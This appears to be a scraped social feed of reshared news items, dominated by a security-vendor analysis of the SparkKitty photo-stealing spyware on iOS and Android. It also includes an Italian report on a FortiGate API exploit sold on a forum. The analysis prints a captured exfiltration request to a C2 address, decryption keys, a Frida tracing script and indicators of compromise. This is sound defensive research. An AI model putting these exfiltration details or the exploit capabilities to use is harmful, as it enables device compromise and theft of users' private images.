reshared this
Luisella doesn't like this.
youtube.com/watch?v=oq912dhncq…
- YouTube
Profitez des vidéos et de la musique que vous aimez, mettez en ligne des contenus originaux, et partagez-les avec vos amis, vos proches et le monde entier.www.youtube.com
reshared this
IAEA says extent of damage at Fordow still unknown
https://www.aljazeera.com/video/newsfeed/2025/6/23/iaea-says-extent-of-damage-at-fordow-still-unknown?utm_source=flipboard&utm_medium=activitypub
Posted into Middle East News @middle-east-news-AlJazeera
IAEA says extent of damage at Fordow still unknown
The head of the UN’s nuclear watchdog the IAEA Rafael Grossi has warned that the global non-proliferation regimeAl Jazeera
Trump Appoints 22-Year-Old Ex-Gardener and Grocery Store Assistant to Lead U.S. Terror Prevention
thedailybeast.com/donald-trump…
#USA #UsPol #Trump #Terrorism #Biden #Politics
Trump Appoints 22-Year-Old Ex-Gardener and Grocery Store Assistant to Lead U.S. Terror Prevention
Counter-terror chief was pulling up weeds just five years ago.Tom Latchem (The Daily Beast)
reshared this
reshared this
Ufficio Zero Linux OS EDUcational - installazione del sistema
Ringraziamo @LorenzoDM socio fondatore Boost Media APS per la realizzazione del video tutorial sull'installazione della release EDU per le scuole italiane di ogni grado di istruzione.
Se credi nell'Open Source puoi iscriverti a Boost Media APS da questo link boostmedia.it/it/iscrizione ed aiutarci in prima linea come socio per la diffusione della tecnologia Open in Italia.
Iscrizione | Boost Media APS
Associazione di Promozione Sociale per Ufficio Zero Linux OS ed il software open source italiano ed europeoboostmedia.it
reshared this
US strikes on Iran trigger protests internationally
https://www.bbc.com/news/videos/c4g2wxwel5qo?utm_source=flipboard&utm_medium=activitypub
Posted into World @world-BBCNews
US strikes on Iran trigger protests internationally
Demonstrators take to the streets in France, Pakistan, Greece and the Philippines to condemn the military action.www.bbc.com
Sensitive content
Sky News: Israel Denies Gaza Access to International Journalists to Restrict Scrutiny and Accountability
London (Quds News Network)- Israel’s continued prevention of international journalists from entering Gaza appears to be motivated less by concerns for their safety and more by a desire to avoid properEditing Team (Quds News Network)
Lo spiega la professoressa Manera dell’ETH: “Colpiti impianti di arricchimento con sostanze perlopiù chimiche, che pongono piuttosto un problema di tossicità”
rsi.ch/s/2925699
freezonemagazine.com/articoli/…
Questo è un romanzo unico, per la sua gestazione, le sue vicissitudini, per la scrittura e per il carattere dell’autore. Nicola Pugliese affermò di averlo scritto in quarantacinque giorni quasi
Opening event imminent for North Korea’s Wonsan Kalma mega beach resort: Imagery | NK PRO
North Korea’s gigantic — and problematic — Wonsan Kalma beach resort is about to finally open with a major ceremony likely attended by leader Kim Jong Un, according to NK Pro analysis of satellite imagery, almost eight years after construction began …NK PRO
Visual Code Generator to End All Generators
QR codes are something that we all take for granted in this day and age. There are even a million apps to create your own QR codes, but what if you want to make a barcode? How about making a specific kind of barcode that follows UPC-E, CODE 39, or even the infamous… CODABAR? Well, it might be more difficult to find a single app that can handle all those different standards. Using “yet-another-web-app”, Barcode Tool – Generator & Scanner, you can rid these worries, created by [Ricardo de Azambuja].
When going to [Ricardo]’s simple application, you will find a straightforward interface that allows you to make far more different strips and square patterns than you’ve ever imagined. Of course, starting with the common QR code, you can create custom overlaid codes like many other QR generators. More uniquely, there are options for any barcode under the sun to help organize your hacker workspace. If you don’t want to download an app to scan the codes, you can even use the included scanner function.
If you want to use the web app, you can find it here! In-depth solutions to rather simple problems are something we strive to provide here at Hackaday, and this project is no exception. However, if you want something more physical, check out this specialized outdoor city cooking station.
SparkKitty, SparkCat’s little brother: A new Trojan spy found in the App Store and Google Play
In January 2025, we uncovered the SparkCat spyware campaign, which was aimed at gaining access to victims’ crypto wallets. The threat actor distributed apps containing a malicious SDK/framework. This component would wait for a user to open a specific screen (typically a support chat), then request access to the device’s gallery. It would then use an OCR model to select and exfiltrate images of interest. Although SparkCat was capable of searching for any text within images, that campaign specifically targeted photos containing seed phrases for crypto wallets. The malware was distributed through unofficial sources as well as Google Play and App Store. Now, we’ve once again come across a new type of spyware that has managed to infiltrate the official app stores. We believe it is connected to SparkCat and also targets the cryptocurrency assets of its victims.
Here are the key facts about this new threat:
- The malware targets both iOS and Android devices, and it is spreading in the wild as well as through the App Store and Google Play.
- On iOS, the malicious payload is delivered as frameworks (primarily mimicking AFNetworking.framework or Alamofire.framework) or obfuscated libraries disguised as libswiftDarwin.dylib, or it can be embedded directly into the app itself.
- The Android-specific Trojan comes in both Java and Kotlin flavors; the Kotlin version is a malicious Xposed module.
- While most versions of this malware indiscriminately steal all images, we discovered a related malicious activity cluster that uses OCR to pick specific pictures.
- The campaign has been active since at least February 2024.
It all began with a suspicious online store…
During routine monitoring of suspicious links, we stumbled upon several similar-looking pages that were distributing TikTok mods for Android. In these modified versions, the app’s main activities would trigger additional code. The code would then request a Base64-encoded configuration file from hxxps://moabc[.]vip/?dev=az. A sample decoded configuration file is shown below.
{
"links": {
"shopCenter": "https://h1997.tiktokapp.club/wap/?",
"goodsList": "https://h1997.tiktokapp.club/www/?",
"orderList": "https://h1997.tiktokapp.club/www/?",
"reg": "https://www.baidu.com",
"footbar": "https://www.baidu.com"
}
}
The links from the configuration file were displayed as buttons within the app. Tapping these opened WebView, revealing an online store named TikToki Mall that accepted cryptocurrency as payment for consumer goods. Unfortunately, we couldn’t verify if it was a legitimate store, as users had to register with an invitation code to make a purchase.
Although we didn’t find any other suspicious functionality within the apps, a gut feeling told us to dig deeper. We decided to examine the code of the web pages distributing the apps, only to find a number of interesting details suggesting they might also be pushing iOS apps.
<div class="t-name">
<div class="tit">
{{if ext=="ipa"}}
<i class="iconfont icon-iphone" style="font-size:inherit;margin-right:5px"></i>
{{else}}
<i class="iconfont icon-android" style="font-size:inherit;margin-right:5px"></i>
{{/if}}
iOS app delivery method
And sure enough, visiting the website on an iPhone triggers a series of redirects, ultimately landing the user on a page that crudely mimics the App Store and prompts them to download an app.
iOS app download page
As you know, iOS doesn’t just let you download and run any app from a third-party source. However, Apple provides members of the Apple Developer Program with so-called provisioning profiles. These allow a developer certificate to be installed on a user device. iOS then uses this certificate to verify the app’s digital signature and determine if it can be launched. Besides the certificate, a provisioning profile contains its expiration date and the permissions to be granted to the app, as well as other information about the developer and the app. Once the profile is installed on a device, the certificate becomes trusted, allowing the app to run.
Provisioning profiles come in several types. Development profiles are used for testing apps and can only be distributed to a predefined set of devices. App Store Connect profiles allow for publishing an app to the App Store. Enterprise profiles were created to allow organizations to develop internal-use apps and install them on their employees’ devices without publishing them on the App Store and without any restrictions on which devices they can be installed on. Although the Apple Developer Program requires a paid membership and developer verification by Apple, Enterprise profiles are often exploited. They are used not only by developers of apps unsuitable for the App Store (online casinos, cracks, cheats, or illegal mods of popular apps) but also by malware creators.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AppIDName</key>
<string>rdcUniApp</string>
<key>ApplicationIdentifierPrefix</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>CreationDate</key>
<date>2025-01-20T06:59:55Z</date>
<key>Platform</key>
<array>
<string>iOS</string>
<string>xrOS</string>
<string>visionOS</string>
</array>
<key>IsXcodeManaged</key>
<false/>
<key>DeveloperCertificates</key>
<array>
<data>OMITTED</data>
</array>
<key>DER-Encoded-Profile</key>
<data>OMITTED</data>
<key>Entitlements</key>
<dict>
<key>application-identifier</key>
<string>EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp</string>
<key>keychain-access-groups</key>
<array>
<string>EHQ3N2D5WH.*</string>
<string>com.apple.token</string>
</array>
<key>get-task-allow</key>
<false/>
<key>com.apple.developer.team-identifier</key>
<string>EHQ3N2D5WH</string>
</dict>
<key>ExpirationDate</key>
<date>2026-01-20T06:59:55Z</date>
<key>Name</key>
<string>syf</string>
<key>ProvisionsAllDevices</key>
<true/>
<key>TeamIdentifier</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>TeamName</key>
<string>SINOPEC SABIC Tianjin Petrochemical Co. Ltd.</string>
<key>TimeToLive</key>
<integer>365</integer>
<key>UUID</key>
<string>55b65f87-9102-4cb9-934a-342dd2be8e25</string>
<key>Version</key>
<integer>1</integer>
</dict>
</plist>
Example of a provisioning profile installed to run a malicious TikTok mod
In the case of the malicious TikTok mods, the attackers used an Enterprise profile, as indicated by the following key in its body:
<key>ProvisionsAllDevices</key>
<true/>
It’s worth noting that installing any provisioning profile requires direct user interaction, which looks like this:
Profile installation flow
Looking for copper, found gold
Just like its Android counterpart, the installed iOS app contained a library that embedded links to a suspicious store within the user’s profile window. Tapping these opened them in WebView.
Suspicious store opened inside a TikTok app
It seemed like a straightforward case: another mod of a popular app trying to make some money. However, one strange detail in the iOS version caught our attention. On every launch, the app requested access to the user’s photo gallery – highly unusual behavior for the original TikTok. Furthermore, the library containing the store didn’t have code accessing the photo gallery, and the Android version never requested image permissions. We were compelled to dig a little deeper and examine the app’s other dependencies. This led to the discovery of a malicious module pretending to be AFNetworking.framework. For a touch of foreshadowing, let’s spotlight a curious detail: certain apps referred to it as Alamofire.framework, but the code itself stayed exactly the same. The original version of AFNetworking is an open-source library that provides developers with a set of interfaces for convenient network operations.
The malicious version differs from the original by a modified AFImageDownloader class and an added AFImageDownloaderTool class. Interestingly, the authors didn’t create separate initialization functions or alter the library’s exported symbols to launch the malicious payload. Instead, they took advantage of a feature in Objective-C that allows classes to define a special load selector, which is automatically called when the app is loading. In this case, the entry point for the malicious payload was the +[AFImageDownloader load] selector, which does not exist in the original framework.
Malicious class entry point
The malicious payload functions as follows:
- It checks if the value of the
ccoolkey in the app’s main Info.plist configuration file matches the string77e1a4d360e17fdbc. If the two differ, the malicious payload will not proceed. - It retrieves the Base64-encoded value of the
ccckey from the framework’s Info.plist file. This value is decoded and then decrypted using AES-256 in ECB mode with the keyp0^tWut=pswHL-x>>:m?^.^)Wpadded with nulls to reach a length of 32 bytes. Some samples were also observed using the keyJ9^tMnt=ptfHL-x>>:m!^.^)A. If there’s noccckey in the configuration or the key’s value is empty, the malware attempts to use the keycom.tt.cfto retrieve an encrypted string from UserDefaults – a database where the app can store information for use in subsequent launches. - The decrypted value is a list of URLs from which the malware fetches additional payloads, encrypted using the same method. This new ciphertext contains a set of C2 addresses used for exfiltrating stolen photos.
- The final step before uploading the photos is to receive authorization from the C2 server. To do this, the malware sends a GET request to the /api/getImageStatus endpoint, transmitting app details and the user’s UUID. The server responds with the following JSON:{"msg":"success","code":0,"status":"1"}The
codefield tells the app whether to repeat the request after a delay, with 0 meaning no, and thestatusfield indicates whether it has permission to upload the photos. - Next, the malware requests access to the user’s photo gallery. It then registers a callback function to monitor for any changes within the gallery. The malware exfiltrates any accessible photos that have not already been uploaded. To keep track of which photos have been stolen, it creates a local database. If the gallery is modified while the app is running, the malware will attempt to access and upload the new images to the C2 server.
Photo exfiltration and upload
Data transmission is performed directly within the selector [AFImageDownloader receiptID:andPicID:] by making a PUT request to the /api/putImages endpoint. In addition to the image itself, information about the app and the device, along with unique user identifiers, is also sent to the server.
PUT /api/putImages HTTP/1.1
Host: 23.249.28.88:7777
Content-Type: multipart/form-data; boundary=Boundary+C9D8BE3781515E01
Connection: keep-alive
Accept: */*
User-Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00)
Accept-Language: en-US;q=1, ja-US;q=0.9, ar-US;q=0.8, ru-US;q=0.7
Content-Length: 80089
Accept-Encoding: gzip, deflate
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="appname"
TikTok
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="buid"
com.zhiliaoapp.musically
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="device"
ios
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="userId"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="uuid"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/Lx/xxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="image"; filename="<name>"
Content-Type: image/jpeg
......JFIF.....H.H.....LExif..MM.*...................i.........&.................e.......... ........8Photoshop 3.0.8BIM........8BIM.%................ ...B~...4ICC_PROFILE......$appl....mntrRGB XYZ .......
Digging deeper
When we found a spyware component in the modified iOS version of TikTok, we immediately wondered if the Trojan had an Android counterpart. Our initial search led us to a bunch of cryptocurrency apps. These apps had malicious code embedded in their entry points. It requests a configuration file with C2 addresses and then decrypts it using AES-256 in ECB mode. These decrypted addresses are then used by the Trojan to send a GET request to /api/anheartbeat. The request includes information about the infected app. The Trojan expects a JSON response. If the code field is 0, it means communication with that C2 is allowed. The status flag in the JSON determines whether the Trojan can send the victim’s images to the server.
Checking C2 addresses
The main functionality of this malware – stealing images from the gallery – works in two stages. First, the malware checks the status flag. If it’s set to allow file uploads, the Trojan then checks the contents of a file named aray/cache/devices/.DEVICES on external storage. The first time it runs, the Trojan writes a hexadecimal number to this file. The number is an MD5 hash of a string containing the infected device’s IMEI, MAC address, and a random UUID. The content of this file is then compared to the string B0B5C3215E6D. If the content is different, the Trojan uploads images from the gallery, along with infected device info, to the command server via a PUT request to /api/putDataInfo. If the content is the same, it only uploads the third image from the end of an alphabetically sorted list. It’s highly likely the attackers use this specific functionality for debugging their malicious code.
Uploading image and device information
Later, we discovered other versions of this Trojan embedded in casino apps. These were loaded using the LSPosed framework, which is designed for app code hooking. Essentially, these Trojan versions acted as malicious Xposed modules. They would hook app entry points and execute code similar to the malware we described earlier, but with a few interesting twists:
- The C2 address storage was located in both the module’s resources and directly within the malware code. Typically, these were two different addresses, and both were used to obtain C2 information.
Procedure for obtaining C2 addresses
- Among the decrypted C2 addresses, the Trojan picks the one corresponding to the fastest server. It does this by sending a request to each server sequentially. If the request is successful, it records the response time. The shortest time then determines which C2 server is used. Note that this algorithm could have been implemented without needing to store intermediate values.
Finding the shortest response time
- The code uses custom names for classes, methods, and fields.
- It is written in Kotlin. Other versions we found were written in Java.
Spyware in official app stores
One of the Android Java apps containing a malicious payload was a messaging app with crypto exchange features. This app was uploaded to Google Play and installed over 10,000 times. It was still available in the store at the time of this research. We notified Google about it.
Infected app on Google Play
Another infected Android app we discovered is named 币coin and distributed through unofficial sources. However, it also has an iOS version. We found it on the App Store and alerted Apple to the presence of the infected app in their store.
Infected app page on the App Store
In both the Android and iOS versions, the malicious payload was part of the app itself, not of a third-party SDK or framework. In the iOS version, the central AppDelegate class, which manages the app’s lifecycle, registers its selector [AppDelegate requestSuccess:] as a handler for responses returned by requests sent to i.bicoin[.]com[.]cn.
Checking the server response and sending a photo
{
code = 0;
data = {
27 = (
);
50002 = (
{
appVersion = "";
cTime = 1696304011000;
id = 491;
imgSubTitle = "";
imgTitle = "\U70ed\U5f00\U5173\Uff08\U65b0\Uff09";
imgType = 50002;
imgUrl = 0;
imgUrlSub = "";
isFullScreen = 0;
isNeed = 1;
isSkip = 1;
langType = all;
operator = 0;
skipUrl = "";
sort = 10000;
source = 0;
type = 0;
uTime = <timestamp>;
}
);
};
dialog = {
cancelAndClose = 0;
cancelBtn = "";
cancelColor = "";
code = 0;
confirmBtn = "";
confirmColor = "";
content = "";
contentColor = "";
time = "";
title = OK;
titleColor = "";
type = 3;
url = "";
};Sample server response
In the response, the imgUrl field contains information about the permission to send photos (1 means granted). Once the Trojan gets the green light, it uses a similar method to what we described earlier: it downloads an encrypted set of C2 addresses and tries sending the images to one of them. By default, it’ll hit the first address on the list. If that one’s down, the malware just moves on to the next. The photo-sending functionality is implemented within the KYDeviceActionManager class.
Retrieving and sending photos
Suspicious libcrypto.dylib mod
During our investigation, we also stumbled upon samples that contained another suspicious library: a modified version of OpenSSL’s cryptographic primitives library, libcrypto.dylib. It showed up under names like wc.dylib and libswiftDarwin.dylib, had initialization functions that were obfuscated with LLVM, and contained a link to a configuration we’d seen before in other malicious frameworks. It also imported the PHPhotoLibrary class, used for gallery access in the files we mentioned earlier. Sometimes the library was delivered alongside the malicious AFNetworking.framework/Alamofire.framework, sometimes not.
Unlike other variants of this malware, this particular library didn’t actually reach out to the malicious configuration file link embedded within it. That meant we had to manually dig for the code responsible for its initial communication with the C2. Even though these library samples are heavily obfuscated, some of them, like the sample with the hash c5be3ae482d25c6537e08c888a742832, still had cross-references to the part of the code where the encrypted configuration page URL was used. This function converted a URL string into an NSString object.
Section of obfuscated code for loading the malicious URL
Using Frida, we can execute any piece of code as a function, but simply converting a string to an NSString object isn’t enough to confirm the library’s malicious intent. So, we followed the cross-references up several levels. When we tried to execute the function that worked with the URL during its execution, we discovered it was making a GET request to the malicious URL. However, we couldn’t get a response right away; the server the URL pointed to was already inactive. To make the function run correctly, we used Frida to substitute the link with a working one, where we knew exactly what data it returned and how it was decrypted. By setting logging hooks on the objc_msgSend call and running the malicious function with a swapped URL, we got the info we needed about the calls. Below is the Frida script we used to do this:
function traceModule(impl, name)
{
console.log("Tracing " + name, impl);
var exit_log = 0;
Interceptor.attach(impl, {
onEnter: function(args) {
var bt = Thread.backtrace(this.context, Backtracer.ACCURATE);
if (!moduleMap) {
moduleMap = new ModuleMap();
}
var modules = bt.map(x => moduleMap.find(x)).filter(x => x != null).map(x => x.name);
// we want to trace only calls originating from malware dylib
if (modules.filter(x => x.includes('wc.dylib')).length > 0) {
exit_log = 1;
console.warn("\n*** entering " + name);
if(name.includes('objc_msgSend')) {
var sel = this.context.x1.readUtf8String();
if (sel.includes("stringWithCString:")) {
var s = this.context.x2.readUtf8String();
if (s.includes('.cn-bj.ufileos.com')) {
console.log("Replacing URL: ", s);
var news = Memory.allocUtf8String('https://data-sdk2.oss-accelerate.aliyuncs.com/file/SGTMnH951121');
this.context.x2 = news;
console.log("New URL: ", this.context.x2.readUtf8String());
}
else
console.log(s);
}
}
//print backtrace
console.log(bt.map(DebugSymbol.fromAddress).join("\n"));
}
},
onLeave: function(retval) {
if (exit_log == 1) {
console.warn("\n***extiting ", name);
console.log(this.context.x0.readByteArray(64));
}
}
});
}
var malInited = false;
var malFunc;
function callMalware() {
if (!malInited) {
malFunc = new NativeFunction(base.add(0x7A77CC), 'void', []);
traceModule(base.add(0x821360), 'objc_msgSend');
malInited = true;
}
malFunc();
}
var mname = "wc.dylib";
var base = Process.enumerateModules().filter(x=>x.name.includes(mname))[0].base;
console.log('Base address: ', base);
malFunc();
Our suspicions were confirmed: the malicious function indeed loads and decrypts the C2 address configuration from a given URL. It then uses this C2 for sending device data, following the same pattern we described earlier and using the same AES-256 key. Below is an excerpt from the function’s execution logs.
*** entering objc_msgSend
### Creating NSString object with decrypted string
[ 0x20193a010 stringWithCString:"http://84.17.37.155:8081" encoding: ]
0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8)
0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8)
*** entering objc_msgSend
### Creating NSString with api endpoint decrypted somewhere in code
[ 0x20193a010 stringWithCString:"%@/api/getStatus?buid=%@&appname=%@&userId=%@" encoding: ]
0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50)
0x102783264 wc.dylib!0x7d3264 (0x7d3264)
### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###
*** entering objc_msgSend
### Getting server response as data object
[ 0x2022d5078 initWithData:encoding: ]
0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4)
0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)
*** leaving objc_msgSend
### Server response in bytes
00000000 41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00 A....!..........
00000010 2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73 .{"msg":"success
00000020 22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a ","code":0,"us":
00000030 31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00 1,"status":"0"}.
The function execution log above clearly shows it uses an IP address from the encrypted configuration file. Device data is sent to this IP’s /api/getStatus endpoint with arguments familiar from previous samples. We also see that the server’s response contains the code and status fields we’ve encountered before. All of this strongly suggests that this library is also involved in stealing user photos. The only thing we haven’t pinpointed yet is the exact conditions under which this malicious function activates. At startup, the library contacts a C2 whose address in encrypted within it, sending device information and expecting a JSON string response from the server. At the time of this research, we hadn’t found any samples with an active C2 address, so we don’t know the precise response it’s looking for. However, we assume that response – or subsequent responses – should contain the permission to start sending photos.
Another activity cluster?
During our research, we stumbled upon a significant number of pages offering for download various scam iOS apps in the PWA (progressive web app) format. At first glance, these pages seemed unrelated to the campaign we describe in this article. However, their code bore a striking resemblance to the pages distributing the malicious TikTok version, which prompted us to investigate how users were landing on them. While digging into the traffic sources, we uncovered ads for various scams and Ponzi schemes on popular platforms.
Scam platform account on YouTube
Some of these PWA-containing pages also included a section prompting users to download a mobile app. For Android users, the link downloaded an APK file that opened the scam platform via WebView.
App download links
Beyond just opening scam websites in WebView, these downloaded APKs had another function. The apps requested access to read storage. Once this was granted, they used the Loader API to register their content download event handler. This handler then selected all JPEG and PNG images. The images were processed using the Google ML Kit library designed for optical character recognition. ML Kit searched for text blocks and then broke them down into lines. If at least three lines containing a word with a minimum of three letters were found, the Trojan would send the image to the attackers’ server – its address was retrieved from Amazon AWS storage.
Code snippet for photo uploads
We’re moderately confident that this activity cluster is connected to the one described above. Here’s why:
- The malicious apps also focus on cryptocurrency themes.
- Similar tactics are employed: the C2 address is also hosted in cloud storage, and gallery content is exfiltrated.
- The pages distributing iOS PWAs look similar to those used to download malicious TikTok mods.
Given this connection between the two activity clusters, we suspect the creators of the apps mentioned earlier might also be spreading them through social media ads.
Campaign goals and targets
Unlike SparkCat, the spyware we analyzed above doesn’t show direct signs of the attackers being interested in victims’ crypto assets. However, we still believe they’re stealing photos with that exact goal in mind. The following details lead us to these conclusions:
- A crypto-only store was embedded within the TikTok app alongside the spyware.
- Among the apps where the spyware was found, several were crypto-themed. For instance, 币coin in the App Store positions itself as a crypto information tracker, and the SOEX messaging app has various crypto-related features as well.
- The main source for distributing the spyware is a network of cookie-cutter app download platforms. During our investigation, we found a significant number of domains that distributed both the described Trojan and PWAs (progressive web apps). Users were directed to these PWAs from various cryptocurrency scam and Ponzi scheme sites.
Our data suggests that the attackers primarily targeted users in Southeast Asia and China. Most of the infected apps we discovered were various Chinese gambling games, TikTok, and adult games. All these apps were originally aimed specifically at users in the regions mentioned above.
Furthermore, we believe this malware is linked to the SparkCat campaign, and here’s our reasoning:
- Some Android apps infected with SparkKitty were built with the same framework as the apps infected with SparkCat.
- In both campaigns, we found the same infected Android apps.
- Within the malicious iOS frameworks, we found debug symbols. They included file paths from the attackers’ systems, which pointed to where their projects were being built. These paths match what we previously observed in SparkCat.
Takeaways
Threat actors are still actively compromising official app stores, and not just for Android – iOS is also a target. The espionage campaign we uncovered uses various distribution methods: it spreads through apps infected with malicious frameworks/SDKs from unofficial sources, as well as through malicious apps directly on the App Store and Google Play. While not technically or conceptually complex, this campaign has been ongoing since at least the beginning of 2024 and poses a significant threat to users. Unlike the previously discovered SparkCat spyware, this malware isn’t picky about which photos it steals from the gallery. Although we suspect the attackers’ main goal is to find screenshots of crypto wallet seed phrases, other sensitive data could also be present in the stolen images.
Judging by the distribution sources, this spyware primarily targets users in Southeast Asia and China. However, it doesn’t have any technical limitations that would prevent it from attacking users in other regions.
Our security products return the following verdicts when detecting malware associated with this campaign:
- HEUR:Trojan-Spy.AndroidOS.SparkKitty.*
- HEUR:Trojan-Spy.IphoneOS.SparkKitty.*
Indicators of compromise
Infected Android apps
b4489cb4fac743246f29abf7f605dd15
e8b60bf5af2d5cc5c501b87d04b8a6c2
aa5ce6fed4f9d888cbf8d6d8d0cda07f
3734e845657c37ee849618e2b4476bf4
fa0e99bac48bc60aa0ae82bc0fd1698d
e9f7d9bc988e7569f999f0028b359720
a44cbed18dc5d7fff11406cc403224b9
2dc565c067e60a1a9656b9a5765db11d
66434dd4402dfe7dda81f834c4b70a82
d851b19b5b587f202795e10b72ced6e1
ce49a90c0a098e8737e266471d323626
cc919d4bbd3fb2098d1aeb516f356cca
530a5aa62fdcca7a8b4f60048450da70
0993bae47c6fb3e885f34cb9316717a3
5e15b25f07020a5314f0068b474fff3d
1346f987f6aa1db5e6deb59af8e5744a
Infected iOS apps
21ef7a14fee3f64576f5780a637c57d1
6d39cd8421591fbb0cc2a0bce4d0357d
c6a7568134622007de026d22257502d5
307a64e335065c00c19e94c1f0a896f2
fe0868c4f40cbb42eb58af121570e64d
f9ab4769b63a571107f2709b5b14e2bc
2b43b8c757c872a19a30dcdcff45e4d8
0aa1f8f36980f3dfe8884f1c6f5d6ddc
a4cca2431aa35bb68581a4e848804598
e5186be781f870377b6542b3cecfb622
2d2b25279ef9365420acec120b98b3b4
149785056bf16a9c6964c0ea4217b42b
931399987a261df91b21856940479634
Malicious iOS frameworks
8c9a93e829cba8c4607a7265e6988646
b3085cd623b57fd6561e964d6fd73413
44bc648d1c10bc88f9b6ad78d3e3f967
0d7ed6df0e0cd9b5b38712d17857c824
b0eda03d7e4265fe280360397c042494
fd4558a9b629b5abe65a649b57bef20c
1b85522b964b38de67c5d2b670bb30b1
ec068e0fc6ffda97685237d8ab8a0f56
f10a4fdffc884089ae93b0372ff9d5d1
3388b5ea9997328eb48977ab351ca8de
931085b04c0b6e23185025b69563d2ce
7e6324efc3acdb423f8e3b50edd5c5e5
8cfc8081559008585b4e4a23cd4e1a7f
Obfuscated malicious iOS libraries
0b7891114d3b322ee863e4eef94d8523
0d09c4f956bb734586cee85887ed5407
2accfc13aaf4fa389149c0a03ce0ee4b
5b2e4ea7ab929c766c9c7359995cdde0
5e47604058722dae03f329a2e6693485
9aeaf9a485a60dc3de0b26b060bc8218
21a257e3b51561e5ff20005ca8f0da65
0752edcf5fd61b0e4a1e01371ba605fd
489217cca81823af56d141c985bb9b2c
b0976d46970314532bc118f522bb8a6f
f0460bdca0f04d3bd4fc59d73b52233b
f0815908bafd88d71db660723b65fba4
6fe6885b8f6606b25178822d7894ac35
Download links for infected apps
hxxps://lt.laoqianf14[.]top/KJnn
hxxps://lt.laoqianf15[.]top/KJnn
hxxps://lt.laoqianf51[.]top/KJnn
hxxps://yjhjymfjnj.wyxbmh[.]cn/2kzos8?a45dd02ac=d4f42319a78b6605cabb5696bacb4677
hxxps://xt.xinqianf38[.]top/RnZr
Pages distributing Trojans
hxxps://accgngrid[.]com
hxxps://byteepic[.]vip
C2 and configuration storage
C2:
23.249.28[.]88
120.79.8[.]107
23.249.28[.]200
47.119.171[.]161
api.fxsdk.com
Configurations
hxxp://120.78.239[.]17:10011/req.txt
hxxp://39.108.186[.]119:10011/req.txt
hxxps://dhoss-2023.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
hxxps://gitee[.]com/bbffipa/data-group/raw/master/02WBUfZTUvxrTMGjh7Uh
hxxps://ok2025-oss.oss-cn-shenzhen.aliyuncs[.]com/ip/FM4J7aWKeF8yK
hxxps://file-ht-2023.oss-cn-shenzhen.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://afwfiwjef-mgsdl-2023.oss-cn-shanghai.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://zx-afjweiofwe.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://dxifjew2.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
hxxps://data-sdk2.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121
hxxps://1111333[.]cn-bj.ufileos[.]com/file/SGTMnH951121
hxxps://tbetter-oss.oss-accelerate.aliyuncs[.]com/ip/CF4J7aWKeF8yKVKu
hxxps://photo-php-all.s3[.]ap-southeast-1.amazonaws[.]com/app/domain.json
hxxps://c1mon-oss.oss-cn-hongkong.aliyuncs[.]com/J2A3SWc2YASfQ2
hxxps://tbetter-oss.oss-cn-guangzhou.aliyuncs[.]com/ip/JZ24J7aYCeNGyKVF2
hxxps://data-sdk.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121
Paths
/sdcard/aray/cache/devices/.DEVICES
FortiGate sotto attacco: in vendita tool per lo sfruttamento massivo delle API esposte
Un nuovo e allarmante sviluppo sta scuotendo il panorama della sicurezza informatica: un attore malevolo ha pubblicizzato sul dark web un exploit altamente sofisticato volto a compromettere dispositivi FortiGate.
Si tratta di un nuovo exploit venduto al prezzo di 12.000 dollari per firewall FortiGate che è apparso in vendita sul noto forum underground Exploit. Il post, pubblicato da un utente con lo pseudonimo Anon-WMG, presenta uno strumento capace di compromettere in modo massivo dispositivi Fortinet sfruttando le API esposte.
Caratteristiche tecniche dell’exploit
Denominato “FortiGate API Dump Exploit (~7.2 e versioni inferiori)”, il tool è in grado di interagire con oltre 170 endpoint delle API FortiGate, con compatibilità dichiarata per le versioni 6.x e 5.x, e testato anche su 7.2.6 e precedenti. Le funzionalità includono:
- Dump automatico da più di 170 endpoint API Fortinet
- Estrazione di informazioni sensibili: configurazioni firewall, utenti VPN locali, portali SSL, backup, chiavi SNMP, parametri DNS, HA e NTP
- Supporto al multithreading (oltre 20 thread) per scansioni rapide e massicce
- Output in formato JSON e file di configurazione strutturati
- Headers stealth e modulo di reporting dedicato (“Report Runner”)
Lo strumento prende di mira:
- Firewall FortiGate con API esposte (porte predefinite: 443 e 10443)
- Portali SSL/VPN configurati in modo errato
L’autore sostiene che l’exploit sia in grado di compromettere:
- Credenziali di rete interne e amministrative (inclusi hash e password cifrate)
- Token attivi SAML/RADIUS/LDAP
